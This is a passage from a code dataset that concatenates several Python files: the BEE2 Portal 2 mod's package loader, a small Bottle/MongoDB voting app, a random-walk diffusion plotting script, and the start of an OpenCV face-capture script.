SelitemData) -> SelitemData:\n \"\"\"Join together two sets of selitem data.\n\n This uses the over_data values if defined, using our_data if not.\n Authors and descriptions will be joined to each other.\n \"\"\"\n if not isinstance(other, SelitemData):\n return NotImplemented\n\n return SelitemData(\n self.name,\n self.short_name,\n self.auth + other.auth,\n other.icon or self.icon,\n other.large_icon or self.large_icon,\n tkMarkdown.join(self.desc, other.desc),\n other.group or self.group,\n other.sort_key or self.sort_key,\n )\n\n\n@attr.define\nclass ObjData:\n \"\"\"Temporary data stored when parsing info.txt, but before .parse() is called.\n\n This allows us to parse all packages before loading objects.\n \"\"\"\n fsys: FileSystem\n info_block: Property\n pak_id: str\n disp_name: str\n\n\n@attr.define\nclass ParseData:\n \"\"\"The arguments for pak_object.parse().\"\"\"\n fsys: FileSystem\n id: str\n info: Property\n pak_id: str\n is_override: bool\n\n\n@attr.define\nclass ExportData:\n \"\"\"The arguments to pak_object.export().\"\"\"\n # Usually str, but some items pass other things.\n selected: Any\n # Some items need to know which style is selected\n selected_style: Style\n all_items: list[EditorItem] # All the items in the map\n renderables: dict[RenderableType, Renderable] # The error/connection icons\n vbsp_conf: Property\n game: Game\n\n\n@attr.define\nclass CorrDesc:\n \"\"\"Name, description and icon for each corridor in a style.\"\"\"\n name: str = ''\n icon: 
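SelitemData.__add__ follows a simple override-merge convention: scalar fields prefer the override via an "or" fallback, while author lists (and descriptions) concatenate. The pattern in miniature, using a tiny stand-in class rather than the package's:

import attr

@attr.define
class Data:  # illustrative stand-in, not the package's class
    name: str
    auth: list

    def __add__(self, other):
        # override wins where it sets a value; author lists concatenate
        return Data(other.name or self.name, self.auth + other.auth)

base = Data("Clean", ["Valve"])
over = Data("", ["BEEmod"])
print(base + over)  # Data(name='Clean', auth=['Valve', 'BEEmod'])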
utils.PackagePath = img.PATH_BLANK\n desc: str = ''\n\n\n# Corridor type to size.\nCORRIDOR_COUNTS = {\n 'sp_entry': 7,\n 'sp_exit': 4,\n 'coop': 4,\n}\n\n# This package contains necessary components, and must be available.\nCLEAN_PACKAGE = 'BEE2_CLEAN_STYLE'.casefold()\n\n# Check to see if the zip contains the resources referred to by the packfile.\nCHECK_PACKFILE_CORRECTNESS = False\n\nVPK_OVERRIDE_README = \"\"\"\\\nFiles in this folder will be written to the VPK during every BEE2 export.\nUse to override resources as you please.\n\"\"\"\n\n\n# The folder we want to copy our VPKs to.\nVPK_FOLDER = {\n # The last DLC released by Valve - this is the one that we\n # overwrite with a VPK file.\n utils.STEAM_IDS['PORTAL2']: 'portal2_dlc3',\n utils.STEAM_IDS['DEST_AP']: 'portal2_dlc3',\n\n # This doesn't have VPK files, and is higher priority.\n utils.STEAM_IDS['APERTURE TAG']: 'portal2',\n}\n\n\nclass NoVPKExport(Exception):\n \"\"\"Raised to indicate that VPK files weren't copied.\"\"\"\n\n\nT = TypeVar('T')\nPakT = TypeVar('PakT', bound='PakObject')\n\n\nclass PakObject:\n \"\"\"PackObject(allow_mult=False, has_img=True): The base class for package objects.\n\n In the class base list, set 'allow_mult' to True if duplicates are allowed.\n If duplicates occur, they will be treated as overrides.\n Set 'has_img' to control whether the object will count towards the images\n loading bar - this should be stepped in the UI.load_packages() method.\n \"\"\"\n # ID of the object\n id: str\n # ID of the package.\n pak_id: str\n # Display name of the package.\n pak_name: str\n\n _id_to_obj: ClassVar[dict[str, PakObject]]\n allow_mult: ClassVar[bool]\n\n def __init_subclass__(\n cls,\n allow_mult: bool = False,\n **kwargs,\n ) -> None:\n super().__init_subclass__(**kwargs)\n OBJ_TYPES[cls.__name__.casefold()] = cls\n\n # Maps object IDs to the object.\n cls._id_to_obj = {}\n cls.allow_mult = allow_mult\n\n @classmethod\n def parse(cls: Type[PakT], data: ParseData) -> PakT:\n \"\"\"Parse the package object from the info.txt block.\n\n ParseData is a namedtuple containing relevant info:\n - fsys, the package's FileSystem\n - id, the ID of the item\n - info, the Property block in info.txt\n - pak_id, the ID of the package\n \"\"\"\n raise NotImplementedError\n\n def add_over(self: PakT, override: PakT):\n \"\"\"Called to override values.\n self is the originally defined item, and override is the override item\n to copy values from.\n \"\"\"\n pass\n\n @staticmethod\n def export(exp_data: ExportData) -> None:\n \"\"\"Export the appropriate data into the game.\n\n ExportData is a namedtuple containing various data:\n - selected: The ID of the selected item (or None)\n - selected_style: The selected style object\n - editoritems: The Property block for editoritems.txt\n - vbsp_conf: The Property block for vbsp_config\n - game: The game we're exporting to.\n \"\"\"\n raise NotImplementedError\n\n @classmethod\n def post_parse(cls) -> None:\n \"\"\"Do processing after all objects have been fully parsed.\"\"\"\n pass\n\n @classmethod\n def all(cls: Type[PakT]) -> Collection[PakT]:\n \"\"\"Get the list of objects parsed.\"\"\"\n return cls._id_to_obj.values()\n\n @classmethod\n def by_id(cls: Type[PakT], object_id: str) -> PakT:\n \"\"\"Return the object with a given ID.\"\"\"\n return cls._id_to_obj[object_id.casefold()]\n\n\ndef reraise_keyerror(err: BaseException, obj_id: str) -> NoReturn:\n \"\"\"Replace NoKeyErrors with a nicer one, giving the item that failed.\"\"\"\n if isinstance(err, IndexError):\n if 
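PakObject's subclass registry is the __init_subclass__ hook: every concrete object type self-registers under its case-folded class name, and per-class options arrive as keyword class arguments. Stripped to its essence:

OBJ_TYPES = {}

class PakObject:
    def __init_subclass__(cls, allow_mult=False, **kwargs):
        super().__init_subclass__(**kwargs)
        OBJ_TYPES[cls.__name__.casefold()] = cls  # self-registration
        cls._id_to_obj = {}                       # per-class instance store
        cls.allow_mult = allow_mult

class Style(PakObject): pass
class Item(PakObject, allow_mult=True): pass

print(sorted(OBJ_TYPES))                  # ['item', 'style']
print(Item.allow_mult, Style.allow_mult)  # True False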
isinstance(err.__cause__, NoKeyError):\n # Property.__getitem__ raises IndexError from\n # NoKeyError, so read from the original\n key_error = err.__cause__\n else:\n # We shouldn't have caught this\n raise err\n else:\n key_error = err\n raise Exception(\n 'No \"{key}\" in {id!s} object!'.format(\n key=key_error.key,\n id=obj_id,\n )\n ) from err\n\n\ndef get_config(\n prop_block: Property,\n fsys: FileSystem,\n folder: str,\n pak_id='',\n prop_name='config',\n extension='.cfg',\n ):\n \"\"\"Extract a config file referred to by the given property block.\n\n Looks for the prop_name key in the given prop_block.\n If the keyvalue has a value of \"\", an empty tree is returned.\n If it has children, a copy of them is returned.\n Otherwise the value is a filename in the zip which will be parsed.\n \"\"\"\n prop_block = prop_block.find_key(prop_name, \"\")\n if prop_block.has_children():\n prop = prop_block.copy()\n prop.name = None\n return prop\n\n if prop_block.value == '':\n return Property(None, [])\n\n # Zips must use '/' for the separator, even on Windows!\n path = folder + '/' + prop_block.value\n if len(path) < 3 or path[-4] != '.':\n # Add extension\n path += extension\n try:\n return fsys.read_prop(path)\n except FileNotFoundError:\n LOGGER.warning('\"{id}:{path}\" not in zip!', id=pak_id, path=path)\n return Property(None, [])\n except UnicodeDecodeError:\n LOGGER.exception('Unable to read \"{id}:{path}\"', id=pak_id, path=path)\n raise\n\n\ndef set_cond_source(props: Property, source: str) -> None:\n \"\"\"Set metadata for Conditions in the given config blocks.\n\n This generates '__src__' keyvalues in Condition blocks with info like\n the source object ID and originating file, so errors can be traced back\n to the config file creating it.\n \"\"\"\n for cond in props.find_all('Conditions', 'Condition'):\n cond['__src__'] = source\n\n\ndef find_packages(pak_dir: str) -> None:\n \"\"\"Search a folder for packages, recursing if necessary.\"\"\"\n found_pak = False\n for name in os.listdir(pak_dir): # Both files and dirs\n name = os.path.join(pak_dir, name)\n folded = name.casefold()\n if folded.endswith('.vpk') and not folded.endswith('_dir.vpk'):\n # _000.vpk files, useless without the directory\n continue\n\n if os.path.isdir(name):\n filesys = RawFileSystem(name)\n else:\n ext = os.path.splitext(folded)[1]\n if ext in ('.bee_pack', '.zip'):\n filesys = ZipFileSystem(name)\n elif ext == '.vpk':\n filesys = VPKFileSystem(name)\n else:\n LOGGER.info('Extra file: {}', name)\n continue\n\n LOGGER.debug('Reading package \"' + name + '\"')\n\n # Gain a persistent hold on the filesystem's handle.\n # That means we don't need to reopen the zip files constantly.\n filesys.open_ref()\n\n # Valid packages must have an info.txt file!\n try:\n info = filesys.read_prop('info.txt')\n except FileNotFoundError:\n # Close the ref we've gotten, since it's not in the dict\n # it won't be done by load_packages().\n filesys.close_ref()\n\n if os.path.isdir(name):\n # This isn't a package, so check the subfolders too...\n LOGGER.debug('Checking subdir \"{}\" for packages...', name)\n find_packages(name)\n else:\n LOGGER.warning('ERROR: package \"{}\" has no info.txt!', name)\n # Don't continue to parse this \"package\"\n continue\n try:\n pak_id = info['ID']\n except IndexError:\n # Close the ref we've gotten, since it's not in the dict\n # it won't be done by load_packages().\n filesys.close_ref()\n raise\n\n if pak_id.casefold() in packages:\n raise ValueError(\n f'Duplicate package with id 
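find_packages picks a filesystem implementation from the path alone — directories become RawFileSystem, .zip/.bee_pack archives ZipFileSystem, .vpk files VPKFileSystem — while skipping the numbered _000.vpk chunks that only make sense next to their _dir.vpk. A condensed, hypothetical form of that dispatch (returning names instead of instances):

import os

def pick_fs(path):
    folded = path.casefold()
    if folded.endswith('.vpk') and not folded.endswith('_dir.vpk'):
        return None  # _000.vpk chunks are useless without their _dir.vpk
    if os.path.isdir(path):
        return 'RawFileSystem'
    ext = os.path.splitext(folded)[1]
    if ext in ('.bee_pack', '.zip'):
        return 'ZipFileSystem'
    if ext == '.vpk':
        return 'VPKFileSystem'
    return None  # just an extra file

print(pick_fs('styles.zip'), pick_fs('pak01_000.vpk'), pick_fs('pak01_dir.vpk'))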
\"{pak_id}\"!\\n'\n 'If you just updated the mod, delete any old files in packages/.'\n ) from None\n\n PACKAGE_SYS[pak_id.casefold()] = filesys\n\n packages[pak_id.casefold()] = Package(\n pak_id,\n filesys,\n info,\n name,\n )\n found_pak = True\n\n if not found_pak:\n LOGGER.info('No packages in folder {}!', pak_dir)\n\n\ndef no_packages_err(pak_dir: str, msg: str) -> NoReturn:\n \"\"\"Show an error message indicating no packages are present.\"\"\"\n from tkinter import messagebox\n import sys\n # We don't have a packages directory!\n messagebox.showerror(\n title='BEE2 - Invalid Packages Directory!',\n message=(\n '{}\\nGet the packages from '\n '\"https://github.com/BEEmod/BEE2-items\" '\n 'and place them in \"{}\".').format(msg, pak_dir + os.path.sep),\n # Add slash to the end to indicate it's a folder.\n )\n sys.exit()\n\n\ndef load_packages(\n pak_dir: str,\n loader: LoadScreen,\n log_item_fallbacks=False,\n log_missing_styles=False,\n log_missing_ent_count=False,\n log_incorrect_packfile=False,\n has_mel_music=False,\n has_tag_music=False,\n) -> Mapping[str, FileSystem]:\n \"\"\"Scan and read in all packages.\"\"\"\n global CHECK_PACKFILE_CORRECTNESS\n pak_dir = os.path.abspath(pak_dir)\n\n if not os.path.isdir(pak_dir):\n no_packages_err(pak_dir, 'The given packages directory is not present!')\n\n Item.log_ent_count = log_missing_ent_count\n CHECK_PACKFILE_CORRECTNESS = log_incorrect_packfile\n\n # If we fail we want to clean up our filesystems.\n should_close_filesystems = True\n try:\n find_packages(pak_dir)\n\n pack_count = len(packages)\n loader.set_length(\"PAK\", pack_count)\n\n if pack_count == 0:\n no_packages_err(pak_dir, 'No packages found!')\n\n # We must have the clean style package.\n if CLEAN_PACKAGE not in packages:\n no_packages_err(\n pak_dir,\n 'No Clean Style package! 
This is required for some '\n 'essential resources and objects.'\n )\n\n data: dict[Type[PakT], list[PakT]] = {}\n obj_override: dict[Type[PakObject], dict[str, list[ParseData]]] = {}\n\n for obj_type in OBJ_TYPES.values():\n all_obj[obj_type] = {}\n obj_override[obj_type] = defaultdict(list)\n data[obj_type] = []\n\n for pack in packages.values():\n if not pack.enabled:\n LOGGER.info('Package {id} disabled!', id=pack.id)\n pack_count -= 1\n loader.set_length(\"PAK\", pack_count)\n continue\n\n with srctools.logger.context(pack.id):\n parse_package(pack, obj_override, has_tag_music, has_mel_music)\n loader.step(\"PAK\")\n\n loader.set_length(\"OBJ\", sum(\n len(obj_type)\n for obj_type in\n all_obj.values()\n ))\n\n for obj_class, objs in all_obj.items():\n for obj_id, obj_data in objs.items():\n # parse through the object and return the resultant class\n try:\n with srctools.logger.context(f'{obj_data.pak_id}:{obj_id}'):\n object_ = obj_class.parse(\n ParseData(\n obj_data.fsys,\n obj_id,\n obj_data.info_block,\n obj_data.pak_id,\n False,\n )\n )\n except (NoKeyError, IndexError) as e:\n reraise_keyerror(e, obj_id)\n raise # Never reached.\n except TokenSyntaxError as e:\n # Add the relevant package to the filename.\n if e.file:\n e.file = f'{obj_data.pak_id}:{e.file}'\n raise\n except Exception as e:\n raise ValueError(\n 'Error occured parsing '\n f'{obj_data.pak_id}:{obj_id} item!'\n ) from e\n\n if not hasattr(object_, 'id'):\n raise ValueError(\n '\"{}\" object {} has no ID!'.format(obj_class.__name__, object_)\n )\n\n # Store in this database so we can find all objects for each type.\n # noinspection PyProtectedMember\n obj_class._id_to_obj[object_.id.casefold()] = object_\n\n object_.pak_id = obj_data.pak_id\n object_.pak_name = obj_data.disp_name\n for override_data in obj_override[obj_class].get(obj_id, []):\n try:\n with srctools.logger.context(f'override {override_data.pak_id}:{obj_id}'):\n override = obj_class.parse(override_data)\n except (NoKeyError, IndexError) as e:\n reraise_keyerror(e, f'{override_data.pak_id}:{obj_id}')\n raise # Never reached.\n except TokenSyntaxError as e:\n # Add the relevant package to the filename.\n if e.file:\n e.file = f'{override_data.pak_id}:{e.file}'\n raise\n except Exception as e:\n raise ValueError(\n f'Error occured parsing {obj_id} override'\n f'from package {override_data.pak_id}!'\n ) from e\n\n object_.add_over(override)\n data[obj_class].append(object_)\n loader.step(\"OBJ\")\n\n should_close_filesystems = False\n finally:\n if should_close_filesystems:\n for sys in PACKAGE_SYS.values():\n sys.close_ref()\n\n LOGGER.info('Object counts:\\n{}\\n', '\\n'.join(\n '{:<15}: {}'.format(obj_type.__name__, len(objs))\n for obj_type, objs in\n data.items()\n ))\n\n for obj_type in OBJ_TYPES.values():\n LOGGER.info('Post-process {} objects...', obj_type.__name__)\n obj_type.post_parse()\n\n # This has to be done after styles.\n LOGGER.info('Allocating styled items...')\n assign_styled_items(\n log_item_fallbacks,\n log_missing_styles,\n )\n return PACKAGE_SYS\n\n\ndef parse_package(\n pack: Package,\n obj_override: dict[Type[PakObject], dict[str, list[ParseData]]],\n has_tag: bool=False,\n has_mel: bool=False,\n) -> None:\n \"\"\"Parse through the given package to find all the components.\"\"\"\n from packages import template_brush # Avoid circular imports\n for pre in pack.info.find_children('Prerequisites'):\n # Special case - disable these packages when the music isn't copied.\n if pre.value == '':\n if not has_tag:\n return\n elif 
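The parse loop wraps low-level failures in a ValueError naming the offending package:object, chaining with "from" so the original traceback survives. The pattern in isolation (names invented for the demo):

def parse_obj(pak_id, obj_id):
    try:
        raise KeyError('authors')  # stand-in for a low-level parse failure
    except Exception as e:
        raise ValueError(f'Error occurred parsing {pak_id}:{obj_id} item!') from e

try:
    parse_obj('BEE2_CLEAN_STYLE', 'clean_style')
except ValueError as err:
    print(err, '| caused by:', repr(err.__cause__))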
pre.value == '':\n if not has_mel:\n return\n elif pre.value.casefold() not in packages:\n LOGGER.warning(\n 'Package \"{pre}\" required for \"{id}\" - '\n 'ignoring package!',\n pre=pre.value,\n id=pack.id,\n )\n return\n\n for obj in pack.info:\n if obj.name in ('prerequisites', 'id', 'name', 'desc'):\n # Not object IDs.\n continue\n if obj.name in ('templatebrush', 'brushtemplate'):\n LOGGER.warning(\n 'TemplateBrush {} no longer needs to be defined in info.txt',\n obj['id', ''],\n )\n continue\n if obj.name == 'overrides':\n for over_prop in obj:\n if over_prop.name in ('templatebrush', 'brushtemplate'):\n LOGGER.warning(\n 'TemplateBrush {} no longer needs to be defined in info.txt',\n over_prop['id', ''],\n )\n continue\n try:\n obj_type = OBJ_TYPES[over_prop.name]\n except KeyError:\n LOGGER.warning('Unknown object type \"{}\" with ID \"{}\"!', over_prop.real_name, over_prop['id', ''])\n continue\n try:\n obj_id = over_prop['id']\n except LookupError:\n raise ValueError('No ID for \"{}\" object type!'.format(obj_type)) from None\n obj_override[obj_type][obj_id].append(\n ParseData(pack.fsys, obj_id, over_prop, pack.id, True)\n )\n else:\n try:\n obj_type = OBJ_TYPES[obj.name]\n except KeyError:\n LOGGER.warning('Unknown object type \"{}\" with ID \"{}\"!', obj.real_name, obj['id', ''])\n continue\n try:\n obj_id = obj['id']\n except LookupError:\n raise ValueError('No ID for \"{}\" object type in \"{}\" package!'.format(obj_type, pack.id)) from None\n if obj_id in all_obj[obj_type]:\n if obj_type.allow_mult:\n # Pretend this is an override\n obj_override[obj_type][obj_id].append(\n ParseData(pack.fsys, obj_id, obj, pack.id, True)\n )\n # Don't continue to parse and overwrite\n continue\n else:\n raise Exception('ERROR! \"' + obj_id + '\" defined twice!')\n all_obj[obj_type][obj_id] = ObjData(\n pack.fsys,\n obj,\n pack.id,\n pack.disp_name,\n )\n\n for template in pack.fsys.walk_folder('templates'):\n if template.path.casefold().endswith('.vmf'):\n template_brush.parse_template(pack.id, template)\n\n\nclass Package:\n \"\"\"Represents a package.\"\"\"\n def __init__(\n self,\n pak_id: str,\n filesystem: FileSystem,\n info: Property,\n name: str,\n ) -> None:\n disp_name = info['Name', None]\n if disp_name is None:\n LOGGER.warning('Warning: {id} has no display name!', id=pak_id)\n disp_name = pak_id.lower()\n\n self.id = pak_id\n self.fsys = filesystem\n self.info = info\n self.name = name\n self.disp_name = disp_name\n self.desc = info['desc', '']\n\n @property\n def enabled(self) -> bool:\n \"\"\"Should this package be loaded?\"\"\"\n if self.id == CLEAN_PACKAGE:\n # The clean style package is special!\n # It must be present.\n return True\n\n return PACK_CONFIG.get_bool(self.id, 'Enabled', default=True)\n\n @enabled.setter\n def enabled(self, value: bool) -> None:\n \"\"\"Enable or disable the package.\"\"\"\n if self.id == CLEAN_PACKAGE:\n raise ValueError('The Clean Style package cannot be disabled!')\n\n PACK_CONFIG[self.id]['Enabled'] = srctools.bool_as_int(value)\n\n def is_stale(self, mod_time: int) -> bool:\n \"\"\"Check to see if this package has been modified since the last run.\"\"\"\n if isinstance(self.fsys, RawFileSystem):\n # unzipped packages are for development, so always extract.\n LOGGER.info('Need to extract resources - {} is unzipped!', self.id)\n return True\n\n zip_modtime = int(os.stat(self.name).st_mtime)\n\n # If zero, it's never extracted...\n if zip_modtime != mod_time or mod_time == 0:\n LOGGER.info('Need to extract resources - {} is stale!', 
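Package.enabled is a config-backed property: it consults the persisted package config with a default of True, and the clean style is special-cased to always load. A minimal stand-in using the stdlib ConfigParser in place of PACK_CONFIG:

import configparser

cfg = configparser.ConfigParser()
cfg.read_string('[MY_PACK]\nEnabled = 0\n')

class Pack:  # illustrative; PACK_CONFIG replaced by a plain ConfigParser
    id = 'MY_PACK'

    @property
    def enabled(self):
        return cfg.getboolean(self.id, 'Enabled', fallback=True)

print(Pack().enabled)  # False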
self.id)\n return True\n return False\n\n def get_modtime(self) -> int:\n \"\"\"After the cache has been extracted, set the modification dates\n in the config.\"\"\"\n if isinstance(self.fsys, RawFileSystem):\n # No modification time\n return 0\n else:\n return int(os.stat(self.name).st_mtime)\n\n\nclass Style(PakObject):\n \"\"\"Represents a style, specifying the era a test was built in.\"\"\"\n def __init__(\n self,\n style_id: str,\n selitem_data: SelitemData,\n items: list[EditorItem],\n renderables: dict[RenderableType, Renderable],\n config=None,\n base_style: Optional[str]=None,\n suggested: tuple[str, str, str, str]=None,\n has_video: bool=True,\n vpk_name: str='',\n corridors: dict[tuple[str, int], CorrDesc]=None,\n ) -> None:\n self.id = style_id\n self.selitem_data = selitem_data\n self.items = items\n self.renderables = renderables\n self.base_style = base_style\n # Set by post_parse() after all objects are read.\n # this is a list of this style, plus parents in order.\n self.bases: list[Style] = []\n self.suggested = suggested or ('', '', 'SKY_BLACK', '')\n self.has_video = has_video\n self.vpk_name = vpk_name\n self.corridors: dict[tuple[str, int], CorrDesc] = {}\n\n for group, length in CORRIDOR_COUNTS.items():\n for i in range(1, length + 1):\n try:\n self.corridors[group, i] = corridors[group, i]\n except KeyError:\n self.corridors[group, i] = CorrDesc()\n\n if config is None:\n self.config = Property(None, [])\n else:\n self.config = config\n\n set_cond_source(self.config, 'Style <{}>'.format(style_id))\n\n @classmethod\n def parse(cls, data: ParseData):\n \"\"\"Parse a style definition.\"\"\"\n info = data.info\n selitem_data = SelitemData.parse(info, data.pak_id)\n base = info['base', '']\n has_video = srctools.conv_bool(\n info['has_video', ''],\n not data.is_override, # Assume no video for override\n )\n vpk_name = info['vpk_name', ''].casefold()\n\n sugg = info.find_key('suggested', [])\n if data.is_override:\n # For overrides, we default to no suggestion..\n sugg = (\n sugg['quote', ''],\n sugg['music', ''],\n sugg['skybox', ''],\n sugg['elev', ''],\n )\n else:\n sugg = (\n sugg['quote', ''],\n sugg['music', ''],\n sugg['skybox', 'SKY_BLACK'],\n sugg['elev', ''],\n )\n\n corr_conf = info.find_key('corridors', [])\n corridors = {}\n\n icon_folder = corr_conf['icon_folder', '']\n\n for group, length in CORRIDOR_COUNTS.items():\n group_prop = corr_conf.find_key(group, [])\n for i in range(1, length + 1):\n prop = group_prop.find_key(str(i), '') # type: Property\n\n if icon_folder:\n icon = utils.PackagePath(data.pak_id, 'corr/{}/{}/{}.jpg'.format(icon_folder, group, i))\n else:\n icon = img.PATH_BLANK\n\n if prop.has_children():\n corridors[group, i] = CorrDesc(\n name=prop['name', ''],\n icon=prop['icon', icon],\n desc=prop['Desc', ''],\n )\n else:\n corridors[group, i] = CorrDesc(\n name=prop.value,\n icon=icon,\n desc='',\n )\n\n if base == '':\n base = None\n try:\n folder = 'styles/' + info['folder']\n except IndexError:\n # It's OK for override styles to be missing their 'folder'\n # value.\n if data.is_override:\n items = []\n renderables = {}\n vbsp = None\n else:\n raise ValueError(f'Style \"{data.id}\" missing configuration folder!')\n else:\n with data.fsys:\n with data.fsys[folder + '/items.txt'].open_str() as f:\n items, renderables = EditorItem.parse(f)\n try:\n vbsp = data.fsys.read_prop(folder + '/vbsp_config.cfg')\n except FileNotFoundError:\n vbsp = None\n\n return cls(\n style_id=data.id,\n selitem_data=selitem_data,\n items=items,\n 
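is_stale reduces to one comparison: the zip's on-disk mtime must equal the cached value, and a cached zero means the package was never extracted. As a standalone predicate:

def is_stale(zip_mtime, cached_mtime):
    return zip_mtime != cached_mtime or cached_mtime == 0

print(is_stale(1700000000, 1700000000))  # False - cache still valid
print(is_stale(1700000500, 1700000000))  # True  - the zip changed
print(is_stale(1700000000, 0))           # True  - never extracted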
renderables=renderables,\n config=vbsp,\n base_style=base,\n suggested=sugg,\n has_video=has_video,\n corridors=corridors,\n vpk_name=vpk_name,\n )\n\n def add_over(self, override: Style) -> None:\n \"\"\"Add the additional commands to ourselves.\"\"\"\n self.items.extend(override.items)\n self.renderables.update(override.renderables)\n self.config += override.config\n self.selitem_data += override.selitem_data\n\n self.has_video = self.has_video or override.has_video\n # If overrides have suggested IDs, use those. Unset values = ''.\n self.suggested = tuple(\n over_sugg or self_sugg\n for self_sugg, over_sugg in\n zip(self.suggested, override.suggested)\n )\n\n @classmethod\n def post_parse(cls) -> None:\n \"\"\"Assign the bases lists for all styles.\"\"\"\n all_styles: dict[str, Style] = {}\n\n for style in cls.all():\n all_styles[style.id] = style\n\n for style in all_styles.values():\n base = []\n b_style = style\n while b_style is not None:\n # Recursively find all the base styles for this one\n if b_style in base:\n # Already hit this!\n raise Exception('Loop in bases for \"{}\"!'.format(b_style.id))\n base.append(b_style)\n b_style = all_styles.get(b_style.base_style, None)\n # Just append the style.base_style to the list,\n # until the style with that ID isn't found anymore.\n style.bases = base\n\n def __repr__(self) -> str:\n return f''\n\n def export(self) -> tuple[list[EditorItem], dict[RenderableType, Renderable], Property]:\n \"\"\"Export this style, returning the vbsp_config and editoritems.\n\n This is a special case, since styles should go first in the lists.\n \"\"\"\n vbsp_config = Property(None, [])\n vbsp_config += self.config.copy()\n\n return self.items, self.renderables, vbsp_config\n\n\ndef desc_parse(\n info: Property,\n desc_id: str,\n pak_id: str,\n *,\n prop_name: str='description',\n) -> tkMarkdown.MarkdownData:\n \"\"\"Parse the description blocks, to create data which matches richTextBox.\n\n \"\"\"\n has_warning = False\n lines = []\n for prop in info.find_all(prop_name):\n if prop.has_children():\n for line in prop:\n if line.name and not has_warning:\n LOGGER.warning('Old desc format: {}', desc_id)\n has_warning = True\n lines.append(line.value)\n else:\n lines.append(prop.value)\n\n return tkMarkdown.convert('\\n'.join(lines), pak_id)\n\n\ndef sep_values(string: str, delimiters: Iterable[str] = ',;/') -> list[str]:\n \"\"\"Split a string by a delimiter, and then strip whitespace.\n\n Multiple delimiter characters can be passed.\n \"\"\"\n delim, *extra_del = delimiters\n if string == '':\n return []\n\n for extra in extra_del:\n string = string.replace(extra, delim)\n\n vals = string.split(delim)\n return [\n stripped for stripped in\n (val.strip() for val in vals)\n if stripped\n ]\n\n\n# Load all the package object classes, registering them in the process.\nfrom packages.item import Item, assign_styled_items\nfrom packages.stylevar import StyleVar\nfrom packages.elevator import Elevator\nfrom packages.editor_sound import EditorSound\nfrom packages.style_vpk import StyleVPK\nfrom packages.signage import Signage\nfrom packages.skybox import Skybox\nfrom packages.music import Music\nfrom packages.quote_pack import QuotePack\nfrom packages.pack_list import PackList\n","sub_path":"src/packages/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":32565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"46453899","text":"# -*- coding: utf-8 -*-\n\nfrom bottle import route, run, 
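Style.post_parse resolves each style's inheritance chain by walking base_style links until they run out, refusing cycles. The same walk on a toy style table:

styles = {'clean': None, 'overgrown': 'clean', 'broken': 'broken'}

def bases(style_id):
    chain, cur = [], style_id
    while cur is not None:
        if cur in chain:
            raise Exception(f'Loop in bases for "{cur}"!')
        chain.append(cur)
        cur = styles.get(cur)
    return chain

print(bases('overgrown'))  # ['overgrown', 'clean']
# bases('broken') would raise: Loop in bases for "broken"!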
template, request, redirect, debug, static_file, TEMPLATE_PATH, abort\nfrom pymongo import MongoClient\nfrom bson.objectid import ObjectId\n\nconnection = MongoClient('localhost', 27017)\ndb = connection.espumalab\nTEMPLATE_PATH.append('espuma/templates/')\n\n@route('/static/', method=\"GET\")\ndef server_static(filename):\n filetype = filename.split('.')\n filetype = filetype[len(filetype) - 1]\n if filetype == 'css':\n return static_file(filename, root='espuma/static/css')\n elif filetype == 'js':\n return static_file(filename, root='espuma/static/js')\n elif filetype == 'png':\n return static_file(filename, root='espuma/static/img')\n else:\n abort(404, 'File not found')\n\n\n@route('/')\ndef index():\n total = 0\n objdb = db.projects.find()\n projects = [project for project in objdb]\n for project in projects: total += project['votes']\n return template('index', projects=projects, total=total)\n\n@route('/vote', method=\"POST\")\ndef vote():\n project_id = request.forms.get('project')\n db.projects.update( { '_id': ObjectId(project_id) }, { '$inc': { 'votes': 1 } } )\n redirect('/')\n\ndebug(True)\nrun(host='localhost', port='8080', reloader=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"188042920","text":"import numpy as np\nimport scipy, scipy.optimize\nimport plots\n\nnreal = 1000\ntmax = 200\nwalk=2*(np.random.random_integers(0, 1, (nreal,200))-0.5)\ncumwalk = np.cumsum(walk, axis=1)\nsq_distance = cumwalk**2\nmean_distance = np.sqrt(np.mean(sq_distance, axis=0))\naxes([0.18,0.18,0.75,0.75])\nplot(mean_distance, lw=2, label='distance moyenne')\n\ndef f(A, y, x):\n err = y - A*np.sqrt(x)\n return err\n\nt = np.arange(tmax)\ncoeff = scipy.optimize.leastsq(f, 0.8, args=(mean_distance, t))\nplot(t, coeff[0]*np.sqrt(t), lw=2, label='fit en $\\sqrt{t}$')\nxlabel('$t$', fontsize=30)\nylabel('$d(t)$', fontsize=30)\nlegend(loc='3')\n\npylab.rcParams.update({'xtick.labelsize': 20})\npylab.rcParams.update({'ytick.labelsize': 20})\nfigure(figsize=(12,6))\naxes([0.1,0.15,0.38,0.75])\nplot(mean_distance**2, lw=2)\nxlabel('$t$', fontsize=20)\nylabel('$d^2(t)$', fontsize=20)\nylim(0, 220)\naxes([0.57,0.15,0.38,0.75])\nplot(mean_distance, lw=2)\nxlabel('$t$', fontsize=22)\nylabel('$d(t)$', fontsize=22)\nylim(0, 15)\n","sub_path":"course_in_french/source/diffusion.py","file_name":"diffusion.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"237191653","text":"import cv2\n\nclassificador = cv2.CascadeClassifier(\"haarcascade-frontalface-default.xml\") #Vai carregar o xml HaarCascade. É o Treinamento para Detecção de faces.\nclassificadorOlho = cv2.CascadeClassifier(\"haarcascade-eye.xml\")\ncamera = cv2.VideoCapture(0) #Vai fazer a captura da imagem da web-can (0) Indica a própria web-Can do notebook\namostra = 1 #Controla quantas fotos foi tiradas\nnumeroAmostras = 25\nid = input('Digite seu identificador: ')\nlargura, altura = 220, 220 #tamanho da imagem\nprint(\"Capturando as Faces... 
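diffusion.py fits the mean walker distance to A·√t (note it appears to assume pylab names like plot, axes, and xlabel are already in scope, e.g. from an interactive pylab session). The underlying claim — that the RMS displacement of an unbiased ±1 walk grows as √t — checks out numerically in a few lines:

import numpy as np

rng = np.random.default_rng(0)
steps = rng.choice([-1, 1], size=(2000, 400))            # 2000 walks, 400 steps
rms = np.sqrt((steps.cumsum(axis=1) ** 2).mean(axis=0))  # RMS displacement
t = np.arange(1, 401)
print(np.allclose(rms, np.sqrt(t), rtol=0.1))            # True, within ~10%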
